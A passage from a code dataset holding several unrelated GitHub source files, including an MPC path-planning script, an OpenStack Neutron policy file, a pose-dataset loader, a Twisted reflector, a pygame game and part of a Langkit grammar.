Map(file_path=map, origin=[-1, -2], resolution=0.005)\n\n # Specify waypoints\n waypoints_x = [-0.75, -0.25, -0.25, 0.25, 0.25, 1.25, 1.25, 0.75, 0.75, 1.25, 1.25, -0.75, -0.75, -0.25]\n waypoints_y = [-1.5, -1.5, -0.5, -0.5, -1.5, -1.5, -1, -1, -0.5, -0.5, 0, 0, -1.5, -1.5]\n\n # Specify path resolution\n path_resolution = 0.05 # m / wp\n\n # Create smoothed reference path\n reference_path = ReferencePath(\n map,\n waypoints_x,\n waypoints_y,\n path_resolution,\n smoothing_distance=5,\n max_width=0.23,\n circular=True,\n )\n\n # add obstacles to the map - more can be added if necessary\n obs1 = Obstacle(cx=0.0, cy=0.05, radius=0.05)\n obs2 = Obstacle(cx=-0.85, cy=-0.5, radius=0.07)\n obs3 = Obstacle(cx=-0.75, cy=-1.5, radius=0.06)\n obs4 = Obstacle(cx=-0.35, cy=-1.0, radius=0.08)\n obs5 = Obstacle(cx=0.35, cy=-1.0, radius=0.02)\n obs6 = Obstacle(cx=0.78, cy=-1.47, radius=0.06)\n obs7 = Obstacle(cx=0.73, cy=-0.9, radius=0.03)\n obs8 = Obstacle(cx=1.2, cy=0.0, radius=0.04)\n obs9 = Obstacle(cx=0.67, cy=-0.05, radius=0.07)\n map.add_obstacles([obs1, obs2, obs3, obs4, obs5, obs6, obs7, obs8, obs9])\n\n return reference_path\n\n\ndef MPC_Problem_setup(reference_path, ay_max=4.0, a_min=-1, a_max=1):\n # model setup\n vehicle = simple_bicycle_model(\n length=0.12, width=0.06, reference_path=reference_path, Ts=0.05\n )\n vehicle.model_setup()\n\n controller = MPC(vehicle)\n\n sim = Simulator(vehicle)\n\n # compute the vehicle speed profile based on speed and acceleration constraints\n speed_constraints = {\n 'a_min': a_min,\n 'a_max': a_max,\n 'v_min': 0.0,\n 'v_max': 1.0,\n 'ay_max': ay_max,\n }\n vehicle.reference_path.compute_speed_profile(speed_constraints)\n\n return vehicle, controller, sim\n\n\nif __name__ == '__main__':\n\n ''' User settings: '''\n show_animation = True\n\n map = 'maps/sim_map.png'\n\n # set up the map/ assign the waypoints/ add obstacles\n reference_path = environment_setup(map)\n\n # initiate the vehicle, controller and simulator objects\n vehicle, controller, sim = MPC_Problem_setup(reference_path)\n\n # set initial state\n x0 = np.array([vehicle.reference_path.waypoints[0].x, vehicle.reference_path.waypoints[0].y,\n vehicle.reference_path.waypoints[0].psi, 0.3, 0])\n controller.mpc.x0 = x0\n sim.simulator.x0 = x0\n controller.mpc.set_initial_guess()\n\n '''\n Main MPC Loop\n '''\n t = 0\n while globals.s < reference_path.length:\n # get control inputs and update the distance covered by the vehicle\n u = controller.get_control(x0)\n x0 = sim.simulator.make_step(u)\n controller.update_distance(x0)\n\n # plot the path and update the driveable area of the environment\n x_predicted = controller.mpc.data.prediction(('_x', 'pos_x'), t_ind=t)[0]\n y_predicted = controller.mpc.data.prediction(('_x', 'pos_y'), t_ind=t)[0]\n reference_path.show(x_predicted, y_predicted)\n sim.show(x0)\n\n # update boundary constraints for the next time step\n controller.constraints()\n t += 1\n\n plt.axis('off')\n plt.pause(0.001)\n\n input('Press any key to exit.')\n","repo_name":"omprabhu31/mpc_self_driving_cars","sub_path":"mpc-path-planning/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8670496081","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron_lib import policy as neutron_policy\nfrom oslo_policy import policy\n\nfrom neutron.conf.policies import base\n\nDEPRECATED_REASON = (\n \"The default security group rules API supports \"\n \"system scope and default roles.\")\n\n\nCOLLECTION_PATH = '/default-security-group-rules'\nRESOURCE_PATH = '/default-security-group-rules/{id}'\n\n\nrules = [\n policy.DocumentedRuleDefault(\n name='create_default_security_group_rule',\n check_str=base.ADMIN,\n scope_types=['project'],\n description='Create a templated of the security group rule',\n operations=[\n {\n 'method': 'POST',\n 'path': COLLECTION_PATH,\n },\n ],\n deprecated_rule=policy.DeprecatedRule(\n name='create_default_security_group_rule',\n check_str=neutron_policy.RULE_ADMIN_ONLY,\n deprecated_reason=DEPRECATED_REASON,\n deprecated_since='2023.2')\n ),\n policy.DocumentedRuleDefault(\n name='get_default_security_group_rule',\n # NOTE(slaweq): it can't be ADMIN_OR_PROJECT_READER constant from the\n # base module because that is using \"project_id\" in the check string\n # and this resource don't belongs to any project thus such\n # check string would fail enforcement.\n check_str='role:reader',\n scope_types=['project'],\n description='Get a templated of the security group rule',\n operations=[\n {\n 'method': 'GET',\n 'path': COLLECTION_PATH,\n },\n {\n 'method': 'GET',\n 'path': RESOURCE_PATH,\n },\n ],\n deprecated_rule=policy.DeprecatedRule(\n name='get_default_security_group_rule',\n check_str=neutron_policy.RULE_ANY,\n deprecated_reason=DEPRECATED_REASON,\n deprecated_since='2023.2')\n ),\n policy.DocumentedRuleDefault(\n name='delete_default_security_group_rule',\n check_str=base.ADMIN,\n scope_types=['project'],\n description='Delete a templated of the security group rule',\n operations=[\n {\n 'method': 'DELETE',\n 'path': RESOURCE_PATH,\n },\n ],\n deprecated_rule=policy.DeprecatedRule(\n name='delete_default_security_group_rule',\n check_str=neutron_policy.RULE_ADMIN_ONLY,\n deprecated_reason=DEPRECATED_REASON,\n deprecated_since='2023.2')\n ),\n]\n\n\ndef list_rules():\n return rules\n","repo_name":"openstack/neutron","sub_path":"neutron/conf/policies/default_security_group_rules.py","file_name":"default_security_group_rules.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"5245940471","text":"import os\nimport torch.utils.data as data\nimport numpy as np\nimport torch\nimport cv2\nimport pickle\nfrom utils.image import flip, shuffle_lr, get_affine_transform, affine_transform\nfrom utils.image import draw_gaussian, adjust_aspect_ratio\nfrom utils.image import transform_preds\n\nclass ThreeDPW(data.Dataset):\n def __init__(self, opt, split):\n print('==> initializing 3D {} data.'.format(split))\n self.data_path = os.path.join(opt.data_dir, '3dpw', 'sequenceFiles', split)\n self.num_joints = 16\n self.acc_idxs = [0, 1, 2, 3, 4, 5, 10, 11, 14, 15]\n self.shuffle_ref = [[0, 5], [1, 4], [2, 3], \n [10, 15], [11, 14], [12, 13]]\n self.mean = np.array([0.485, 0.456, 0.406], np.float32).reshape(1, 
1, 3)\n self.std = np.array([0.229, 0.224, 0.225], np.float32).reshape(1, 1, 3)\n self.edges = [[0, 1], [1, 2], [2, 6], [6, 3], [3, 4], [4, 5], \n [10, 11], [11, 12], [12, 8], [8, 13], [13, 14], [14, 15], \n [6, 8], [8, 9]]\n self.edges_3d = [[3, 2], [2, 1], [1, 0], [0, 4], [4, 5], [5, 6], \\\n [0, 7], [7, 8], [8, 10],\\\n [16, 15], [15, 14], [14, 8], [8, 11], [11, 12], [12, 13]]\n annot = {}\n tags = ['image','joints','center','scale']\n self.files = os.listdir(self.data_path)\n self.split = split\n self.opt = opt\n\n def _load_image(self, index):\n with open(os.path.join(self.data_path, self.files[index]), 'rb') as f:\n data = pickle.load(f, encoding='latin1')\n sequence = data['sequence']\n img_id = data['img_frame_ids']\n # assuming image filename is in format sequence_imgid.jpg\n image_filename = \"{}_{}.jpg\".format(sequence, img_id)\n image_path = os.path.join(self.opt.data_dir, '3dpw', 'imageFiles', sequence, image_filename)\n img = cv2.imread(image_path)\n return img, data\n\n def _get_part_info(self, data):\n pts = np.array(data['poses2d']).copy().astype(np.float32)\n c = np.mean(pts, axis=0)\n s = max(pts[:, 0].max() - pts[:, 0].min(), pts[:, 1].max() - pts[:, 1].min())\n return pts, c, s\n \n def __getitem__(self, index):\n img, data = self._load_image(index)\n pts, c, s = self._get_part_info(data)\n r = 0\n\n # Transformations as in MPII\n if self.split == 'train':\n sf = self.opt.scale\n rf = self.opt.rotate\n s = s * np.clip(np.random.randn()*sf + 1, 1 - sf, 1 + sf)\n r = np.clip(np.random.randn()*rf, -rf*2, rf*2) if np.random.random() <= 0.6 else 0\n\n trans_input = get_affine_transform(c, s, r, [self.opt.input_w, self.opt.input_h])\n inp = cv2.warpAffine(img, trans_input, (self.opt.input_w, self.opt.input_h),\n flags=cv2.INTER_LINEAR)\n\n trans_output = get_affine_transform(c, s, r, [self.opt.output_w, self.opt.output_h])\n out = np.zeros((self.num_joints, self.opt.output_h, self.opt.output_w), dtype=np.float32)\n\n for i in range(self.num_joints):\n if pts[i, 0] > 0 or pts[i, 1] > 0:\n pt = affine_transform(pts[i], trans_output)\n out[i] = draw_gaussian(out[i], pt, self.opt.hm_gauss)\n\n inp = (inp.astype(np.float32) / 255.)\n inp = (inp - self.mean) / self.std\n inp = inp.transpose(2, 0, 1)\n \n return inp, out\n\n def __len__(self):\n return len(self.files)\n \n def convert_eval_format(self, pred, conf, meta):\n ret = np.zeros((pred.shape[0], pred.shape[1], 2))\n for i in range(pred.shape[0]):\n ret[i] = transform_preds(\n pred[i], meta['center'][i].numpy(), meta['scale'][i].numpy(), \n [self.opt.output_h, self.opt.output_w])\n return ret\n","repo_name":"MeghanaChillara0203/pytorch-pose-hg-3d_CLASSPROJECT","sub_path":"src/lib/datasets/threedpw.py","file_name":"threedpw.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"17496587825","text":"import weakref\n\nfrom twisted.enterprise.util import DBError\n\nclass Reflector:\n \"\"\"Base class for enterprise reflectors. 
This implements row caching.\n \"\"\"\n populated = 0\n\n def __init__(self, rowClasses):\n \"\"\"\n Initialize me against a database.\n\n @param rowClasses: a list of row class objects that describe the\n database schema.\n \"\"\"\n\n self.rowCache = weakref.WeakValueDictionary() # does not hold references to cached rows.\n self.rowClasses = rowClasses\n self.schema = {}\n self._populate()\n\n def __getstate__(self):\n d = self.__dict__.copy()\n del d['rowCache']\n return d\n\n def __setstate__(self, state):\n self.__dict__ = state\n self.rowCache = weakref.WeakValueDictionary()\n self._populate()\n\n def _populate(self):\n \"\"\"Implement me to populate schema information for the reflector.\n \"\"\"\n raise DBError(\"not implemented\")\n\n def populateSchemaFor(self, tableInfo):\n \"\"\"This is called once for each registered rowClass to add it\n and its foreign key relationships for that rowClass to the\n schema.\"\"\"\n\n self.schema[ tableInfo.rowTableName ] = tableInfo\n\n # add the foreign key to the foreign table.\n for foreignTableName, childColumns, parentColumns, containerMethod, autoLoad in tableInfo.rowForeignKeys:\n self.schema[foreignTableName].addForeignKey(childColumns,\n parentColumns, tableInfo.rowClass,\n containerMethod, autoLoad)\n\n def getTableInfo(self, rowObject):\n \"\"\"Get a TableInfo record about a particular instance.\n\n This record contains various information about the instance's\n class as registered with this reflector.\n\n @param rowObject: a L{RowObject} instance of a class previously\n registered with me.\n @raises twisted.enterprise.row.DBError: raised if this class was not\n previously registered.\n \"\"\"\n try:\n return self.schema[rowObject.rowTableName]\n except KeyError:\n raise DBError(\"class %s was not registered with %s\" % (\n rowObject.__class__, self))\n\n def buildWhereClause(self, relationship, row):\n \"\"\"util method used by reflectors. builds a where clause to link a row to another table.\n \"\"\"\n whereClause = []\n for i in range(0,len(relationship.childColumns)):\n value = getattr(row, relationship.parentColumns[i][0])\n whereClause.append( [relationship.childColumns[i][0], EQUAL, value] )\n return whereClause\n\n def addToParent(self, parentRow, rows, tableName):\n \"\"\"util method used by reflectors. adds these rows to the parent row object.\n If a rowClass does not have a containerMethod, then a list attribute \"childRows\"\n will be used.\n \"\"\"\n parentInfo = self.getTableInfo(parentRow)\n relationship = parentInfo.getRelationshipFor(tableName)\n if not relationship:\n raise DBError(\"no relationship from %s to %s\" % ( parentRow.rowTableName, tableName) )\n\n if not relationship.containerMethod:\n if hasattr(parentRow, \"childRows\"):\n for row in rows:\n if row not in parentRow.childRows:\n parentRow.childRows.append(row)\n else:\n parentRow.childRows = rows\n return\n\n if not hasattr(parentRow, relationship.containerMethod):\n raise DBError(\"parent row (%s) doesnt have container method <%s>!\" % (parentRow, relationship.containerMethod))\n\n meth = getattr(parentRow, relationship.containerMethod)\n for row in rows:\n meth(row)\n\n ####### Row Cache ########\n\n def addToCache(self, rowObject):\n \"\"\"NOTE: Should this be recursive?! 
requires better container knowledge...\"\"\"\n self.rowCache[ rowObject.getKeyTuple() ] = rowObject\n\n def findInCache(self, rowClass, kw):\n keys = []\n keys.append(rowClass.rowTableName)\n for keyName, keyType in rowClass.rowKeyColumns:\n keys.append( kw[keyName] )\n keyTuple = tuple(keys)\n return self.rowCache.get(keyTuple)\n\n def removeFromCache(self, rowObject):\n \"\"\"NOTE: should this be recursive!??\"\"\"\n key = rowObject.getKeyTuple()\n if self.rowCache.has_key(key):\n del self.rowCache[key]\n\n ####### Row Operations ########\n\n def loadObjectsFrom(self, tableName, parent=None, data=None,\n whereClause=[], loadChildren=1):\n \"\"\"Implement me to load objects from the database.\n\n @param whereClause: a list of tuples of (columnName, conditional, value)\n so it can be parsed by all types of reflectors. eg.::\n whereClause = [(\"name\", EQUALS, \"fred\"), (\"age\", GREATERTHAN, 18)]\n \"\"\"\n raise DBError(\"not implemented\")\n\n def updateRow(self, rowObject):\n \"\"\"update this rowObject to the database.\n \"\"\"\n raise DBError(\"not implemented\")\n\n def insertRow(self, rowObject):\n \"\"\"insert a new row for this object instance.\n \"\"\"\n raise DBError(\"not implemented\")\n\n def deleteRow(self, rowObject):\n \"\"\"delete the row for this object from the database.\n \"\"\"\n raise DBError(\"not implemented\")\n\n# conditionals\nEQUAL = 0\nLESSTHAN = 1\nGREATERTHAN = 2\nLIKE = 3\n\n\n__all__ = ['Reflector', 'EQUAL', 'LESSTHAN', 'GREATERTHAN', 'LIKE']\n","repo_name":"ActiveState/OpenKomodoIDE","sub_path":"contrib/twisted/TwistedCore-2.4.0/twisted/enterprise/reflector.py","file_name":"reflector.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"72"} +{"seq_id":"466910499","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport pytest\n\nfrom travel.rasp.train_api.train_partners.base.train_details.utils import set_pets, OWNER_DOSS, BRAND_LASTOCHKA\n\nOWNER_FPK = 'ФПК'\nBRAND_BAIKAL = 'Байкал'\n\n\nclass Coach(object):\n def __init__(self, pet_in_coach, pet_places_only):\n self.pet_in_coach = pet_in_coach\n self.pet_places_only = pet_places_only\n self.pets_allowed = False\n self.pets_segregated = False\n\n\nclass ExpectedCoach(object):\n def __init__(self, pets_allowed, pets_segregated):\n self.pets_allowed = pets_allowed\n self.pets_segregated = pets_segregated\n\n\n@pytest.mark.parametrize('coach_owner, train_brand, coaches, expected_coaches', (\n (OWNER_FPK, BRAND_BAIKAL, [Coach(False, False), Coach(False, False)],\n [ExpectedCoach(False, False), ExpectedCoach(False, False)]),\n\n (OWNER_FPK, BRAND_BAIKAL, [Coach(False, False), Coach(True, False)],\n [ExpectedCoach(False, False), ExpectedCoach(True, False)]),\n\n (OWNER_DOSS, BRAND_LASTOCHKA, [Coach(False, False), Coach(False, False)],\n [ExpectedCoach(False, False), ExpectedCoach(False, False)]),\n\n (OWNER_DOSS, BRAND_LASTOCHKA, [Coach(False, False), Coach(True, False)],\n [ExpectedCoach(False, False), ExpectedCoach(False, True)]),\n\n (OWNER_DOSS, BRAND_LASTOCHKA, [Coach(False, False), Coach(False, True)],\n [ExpectedCoach(False, False), ExpectedCoach(True, True)]),\n\n (OWNER_DOSS, BRAND_LASTOCHKA, [Coach(False, False), Coach(True, False), Coach(False, True)],\n [ExpectedCoach(False, False), ExpectedCoach(False, True), ExpectedCoach(True, True)])\n))\ndef test_set_pets(coach_owner, train_brand, coaches, expected_coaches):\n coaches_with_pets = 
set_pets(coach_owner, train_brand, coaches)\n\n for index, coach in enumerate(coaches_with_pets):\n check_coach(coach, expected_coaches[index])\n\n\ndef check_coach(actual_coach, expected_coach):\n assert actual_coach.pets_allowed == expected_coach.pets_allowed\n assert actual_coach.pets_segregated == expected_coach.pets_segregated\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/train_partners/base/train_details/utils/test_set_pets.py","file_name":"test_set_pets.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15804123217","text":"from random import choice\nimport pygame\n\nfrom settings import settings\nfrom score import score\nfrom player import player\nfrom sprite_group import groups\nfrom blood import blood \n\n\ndef check_player_collision():\n \"\"\"Check if player collides with a mob.\"\"\"\n if not player.is_invulnerable:\n mobs_hitbox_hitten = pygame.sprite.groupcollide(\n groups[\"mobs_hitbox\"], \n groups[\"player_hitbox\"], \n False, False)\n for mob_hitbox in mobs_hitbox_hitten.keys():\n for mob in groups[\"mobs\"].sprites():\n if mob.hitbox == mob_hitbox:\n if not mob.is_invincible:\n player.hp -= 1\n if player.hp == 0:\n player_dead()\n else:\n choice(settings.player_sounds[\"hit\"]).play()\n player.go_invulnerable()\n\ndef player_dead():\n \"\"\"\n Empty mob_hitbox, mobs and heart groups, reset settings and for the player:\n - Play death sound\n - Set status to Death\n - Set is_dying to True.\n - Slow down animation speed\n \"\"\"\n choice(settings.player_sounds[\"death\"]).play().set_volume(0.5)\n player.frame_index = 0\n player.status = \"Death\"\n player.is_dying = True\n player.animation_speed = 0.1\n groups[\"mobs_hitbox\"].empty()\n groups[\"mobs\"].empty()\n groups[\"heart\"].remove(blood)\n settings.reset()\n\ndef set_and_draw_intro_background():\n \"\"\"Set and draw the background of the intro screen.\"\"\"\n intro_background_surf = pygame.Surface(settings.screen_size)\n pygame.Surface.fill(intro_background_surf, \"#207a6b\")\n intro_background_rect = intro_background_surf.get_rect(topleft = (0,0))\n settings.screen.blit(intro_background_surf,intro_background_rect)\n\ndef set_and_draw_intro_avatar():\n \"\"\"Set and draw the avatar of the intro screen.\"\"\"\n avatar_center = (600,150)\n avatar_surf = pygame.image.load(\n \"graphics/Knight/Idle/idle1.png\").convert_alpha()\n avatar_surf = pygame.transform.scale2x(avatar_surf)\n avatar_rect = avatar_surf.get_rect(center=avatar_center)\n settings.screen.blit(avatar_surf, avatar_rect)\n\ndef set_and_draw_intro_scrore():\n \"\"\"Set and draw current score on the intro screen.\"\"\"\n score_str = f\"Your score: {score.user_score}\"\n score_surf = pygame.font.Font.render(\n settings.intro_font,\n score_str,\n False,\n settings.intro_color\n )\n score_rect = score_surf.get_rect(topleft=(20, 120))\n settings.screen.blit(score_surf, score_rect)\n\ndef set_and_draw_intro_best_scrore():\n \"\"\"Set and draw best score on the intro screen.\"\"\"\n best_score_str = f\"Best score: {score.best_score}\" \n best_score_surf = pygame.font.Font.render(\n settings.intro_font,\n best_score_str,\n False,\n settings.intro_color\n )\n best_score_rect = best_score_surf.get_rect(topleft=(20, 60))\n settings.screen.blit(best_score_surf, best_score_rect)\n\ndef set_and_draw_intro_title():\n \"\"\"Set and draw intro screen's title.\"\"\"\n title_str = \"You are ambushed!!!\"\n title_surf = 
pygame.font.Font.render(\n settings.intro_font,\n title_str,\n False,\n settings.intro_color\n )\n title_rect = title_surf.get_rect(midtop=(settings.screen_width/2, 20))\n settings.screen.blit(title_surf, title_rect)\n\ndef set_and_draw_intro_controls():\n \"\"\"Set and draw the controls on the intro screen.\"\"\"\n controls = [\"Left / Right: Arrows\", \"Jump: up arrow\",\"Attack: Space bar\", \"Super Attack: left shift\"]\n for index, control in enumerate(controls):\n surf = pygame.font.Font.render(\n settings.intro_font,\n control,\n False,\n settings.intro_color\n )\n y_pos = 80 + 60 * index \n rect = surf.get_rect(topleft=(20, y_pos))\n settings.screen.blit(surf, rect)\n\ndef set_and_draw_intro_start():\n start_str = \"Hit Return to start\"\n start_surf = pygame.font.Font.render(\n settings.intro_font, \n start_str,\n False,\n settings.intro_color\n )\n start_rect = start_surf.get_rect(midtop=(settings.screen_width/2, 320))\n settings.screen.blit(start_surf, start_rect)\n\ndef draw_intro_screen():\n \"\"\"Draw the intro screen.\"\"\"\n set_and_draw_intro_background()\n set_and_draw_intro_avatar()\n if settings.game_started:\n set_and_draw_intro_scrore()\n set_and_draw_intro_best_scrore()\n else:\n set_and_draw_intro_title()\n set_and_draw_intro_controls()\n set_and_draw_intro_start()\n","repo_name":"OGR-67/ambush","sub_path":"game_over.py","file_name":"game_over.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30680802193","text":"def face():\n\timport jetson.inference\n\timport jetson.utils\n\n\tnet = jetson.inference.detectNet(\"ssd-mobilenet-v2\", threshold=0.5)\n\tcamera = jetson.utils.videoSource(\"csi://0\") # '/dev/video0' for V4L2\n\tdisplay = jetson.utils.videoOutput(\"display://0\") # 'my_video.mp4' for file\n\n\twhile display.IsStreaming():\n\t\timg = camera.Capture()\n\t\tdetections = net.Detect(img)\n\t\tfor detection in detections:\n\t\t\tif (net.GetClassDesc(detection.ClassID) == \"person\"):\n\t\t\t\treturn\n\t\tdisplay.Render(img)\n\t\tdisplay.SetStatus(\"Object Detection | Network {:.0f} FPS\".format(net.GetNetworkFPS()))\nface()\n\t\n","repo_name":"leowong1120/ceng3410_project","sub_path":"my_detection.py","file_name":"my_detection.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25809220446","text":"# Print the first i terms of the Fibonacci sequence\ni = int(input('Enter the number of terms: '))\nn = int(1)\nna = int(0)\nnb = int(0)\nc = int(0)\nif i == 1:\n print('0')\nwhile c < i-1:\n nb = n\n n = na + n\n if c == 0:\n print('0', end=' -> ')\n print(f'{nb}',end=' -> ')\n na = nb\n c += 1\nprint('END')","repo_name":"eduardoschmitt/Python-3-Curso-em-V-deo","sub_path":"ex063.py","file_name":"ex063.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41221532411","text":"from typing import List\n\n\nclass Solution:\n def addToArrayForm(self, A: List[int], K: int) -> List[int]:\n s=\"\"\n for i in range(len(A)):\n s+=str(A[i])\n l=str(int(s)+K)\n res=[]\n for i in l:\n res.append(i)\n return res\n \n","repo_name":"Lazy-coder-Hemlock/Leet_Code-Solutions","sub_path":"989. Add to Array-Form of Integer.py","file_name":"989. 
Add to Array-Form of Integer.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34140606","text":"from __future__ import absolute_import, division, print_function\n\nfrom langkit.dsl import (\n ASTNode, abstract, Field, T, Bool, LexicalEnv, synthetic, Struct,\n UserField, NullField, Symbol, LogicVar, Annotations\n)\nfrom langkit.envs import EnvSpec, add_env, add_to_env_kv, handle_children\nfrom langkit.expressions import (\n Self, Entity, langkit_property, Property, AbstractProperty, Not, No, If,\n ArrayLiteral, String, Var, AbstractKind, Let, Bind, LogicTrue, LogicFalse,\n Or, And, PropertyError, ignore, Try, Cond, Predicate, DynamicVariable,\n bind, CharacterLiteral\n)\n\n\nclass Renaming(Struct):\n from_symbol = UserField(type=T.Symbol)\n to_symbol = UserField(type=T.Symbol)\n\n\nclass Substitution(Struct):\n from_symbol = UserField(type=T.Symbol)\n to_term = UserField(type=T.Term)\n\n\nclass Template(Struct):\n origin = UserField(type=T.Term)\n instance = UserField(type=T.Term)\n new_symbols = UserField(type=T.Symbol.array)\n\n\nclass Binding(Struct):\n target = UserField(type=T.Term)\n domain_val = UserField(type=T.Term)\n\n\nclass UnifyEquation(Struct):\n eq = UserField(type=T.Equation)\n renamings = UserField(type=Renaming.array)\n\n\nclass DomainEquation(Struct):\n eq = UserField(type=T.Equation)\n templates = UserField(type=T.Identifier.array)\n\n\nclass UnifyQuery(Struct):\n first = UserField(type=T.Term)\n second = UserField(type=T.Term)\n\n\nclass TypingsDescription(Struct):\n bindings = UserField(type=T.Binding.array)\n equations = UserField(type=T.UnifyQuery.array)\n new_symbols = UserField(type=T.Symbol.array)\n\n\nclass UnificationContext(Struct):\n symbols = UserField(type=T.Symbol.array)\n vars = UserField(type=T.LogicVarArray)\n self_parent = UserField(type=T.Term)\n other_parent = UserField(type=T.Term)\n\n\nclass HigherOrderUnificationContext(Struct):\n arg = UserField(type=T.Term)\n res = UserField(type=T.Term)\n\n\nclass ExtractionContext(Struct):\n target = UserField(type=T.Symbol)\n first_context = UserField(type=T.Term)\n second_context = UserField(type=T.Term)\n\n\nclass ConstrainedTerm(Struct):\n term = UserField(type=T.Term)\n constraints = UserField(type=Substitution.array)\n\n\nclass Constructor(Struct):\n template = UserField(type=Template)\n substs = UserField(type=Substitution.array)\n\n\nclass SynthesisContext(Struct):\n intros = UserField(type=T.Introduction.array)\n bound_generics = UserField(type=T.Symbol.array)\n\n\nclass SynthesizationHole(Struct):\n sym = UserField(type=T.Symbol)\n domain_val = UserField(type=T.Term)\n ctx = UserField(type=SynthesisContext)\n\n\nclass SynthesizationAttempt(Struct):\n term = UserField(type=T.Term)\n holes = UserField(type=SynthesizationHole.array)\n free_symbols = UserField(type=T.Symbol.array)\n\n\nunification_context = DynamicVariable(\n \"unification_context\", type=UnificationContext\n)\n\nho_unification_context = DynamicVariable(\n \"ho_unification_context\", type=HigherOrderUnificationContext\n)\n\nextraction_context = DynamicVariable(\n \"extraction_context\", type=ExtractionContext\n)\n\nsynthesis_context = DynamicVariable(\n \"synthesis_context\", type=SynthesisContext\n)\n\n\n@abstract\nclass DependzNode(ASTNode):\n \"\"\"\n Root node class for Dependz AST nodes.\n \"\"\"\n @langkit_property(public=True)\n def make_ident(name=T.Symbol):\n return Self.unit.root.make_ident_from_self(name)\n\n 
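# These make_* helpers delegate to memoized *_from_self constructors on the\n # unit root, so structurally identical synthetic nodes are shared rather\n # than rebuilt on every call.\n 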
@langkit_property(public=True)\n def make_apply(t1=T.Term, t2=T.Term):\n return Self.unit.root.make_apply_from_self(t1, t2)\n\n @langkit_property(public=True)\n def make_abstraction(id=T.Identifier, rhs=T.Term):\n return Self.unit.root.make_abstraction_from_self(id, rhs)\n\n @langkit_property(public=True)\n def make_arrow(t1=T.Term, t2=T.Term,\n t3=(T.Term, No(T.Term))):\n return Self.unit.root.make_arrow_from_self(t1, t2, t3)\n\n @langkit_property()\n def make_nested_intro(name=T.Identifier, dom=T.Term,\n bound_generics=T.Symbol.array):\n return Self.unit.root.make_nested_intro_from_self(name, dom,\n bound_generics)\n\n @langkit_property(return_type=T.LogicVarArray, memoized=True)\n def make_logic_var_array():\n return LogicVarArray.new()\n\n @langkit_property(memoized=True, return_type=T.SyntheticId)\n def make_ident_from_self(name=T.Symbol):\n return SyntheticId.new(name=name)\n\n @langkit_property(memoized=True, return_type=T.SyntheticApply)\n def make_apply_from_self(t1=T.Term, t2=T.Term):\n return SyntheticApply.new(lhs=t1, rhs=t2)\n\n @langkit_property(memoized=True, return_type=T.SyntheticAbstraction)\n def make_abstraction_from_self(id=T.Identifier, rhs=T.Term):\n return SyntheticAbstraction.new(ident=id, term=rhs)\n\n @langkit_property(memoized=True, return_type=T.SyntheticArrow)\n def make_arrow_from_self(t1=T.Term, t2=T.Term,\n t3=(T.Term, No(T.Term))):\n return SyntheticArrow.new(lhs=t1, rhs=t2, binder=t3)\n\n @langkit_property(memoized=True, return_type=T.NestedIntroduction)\n def make_nested_intro_from_self(name=T.Identifier, dom=T.Term,\n bound_generics=T.Symbol.array):\n return NestedIntroduction.new(ident=name, term=dom,\n bound_generics=bound_generics)\n\n @langkit_property(return_type=T.Symbol)\n def unique_fresh_symbol(prefix=T.Symbol):\n return Self.concat_symbol_and_integer(\n prefix,\n Self.unit.root.next_global_integer\n )\n\n @langkit_property(external=True, return_type=T.Int,\n uses_entity_info=False, uses_envs=False)\n def next_global_integer():\n pass\n\n @langkit_property(external=True, return_type=T.Symbol,\n uses_entity_info=False, uses_envs=False)\n def concat_symbol_and_integer(s=T.Symbol, i=T.Int):\n pass\n\n @langkit_property(external=True, return_type=T.LogicVar,\n uses_entity_info=False, uses_envs=False)\n def create_logic_var():\n pass\n\n @langkit_property(external=True, return_type=T.LogicVar,\n uses_entity_info=False, uses_envs=False)\n def create_named_logic_var(name=T.Symbol):\n pass\n\n @langkit_property(external=True, return_type=T.Bool,\n uses_entity_info=False, uses_envs=False)\n def set_allow_orphan_relations(do_allow=T.Bool):\n pass\n\n @langkit_property(return_type=T.Bool)\n def solve_allowing_orphans(equation=T.Equation):\n ignore(Var(Self.set_allow_orphan_relations(True)))\n return equation.solve\n\n @langkit_property(return_type=T.DependzNode, activate_tracing=True)\n def here():\n return Self\n\n @langkit_property(public=True, external=True, return_type=T.Bool,\n uses_entity_info=False, uses_envs=False)\n def dump_mmz_map():\n pass\n\n @langkit_property(return_type=Substitution.array,\n activate_tracing=True)\n def unify_all_with_constraints(queries=UnifyQuery.array,\n domain_constraints=UnifyQuery.array,\n symbols=T.Symbol.array,\n allow_incomplete=(T.Bool, False)):\n vars = Var(Self.make_logic_var_array)\n ctx = Var(UnificationContext.new(\n symbols=symbols,\n vars=vars,\n self_parent=No(Term),\n other_parent=No(Term)\n ))\n\n query_results = Var(queries.map(\n lambda q: unification_context.bind(\n ctx,\n 
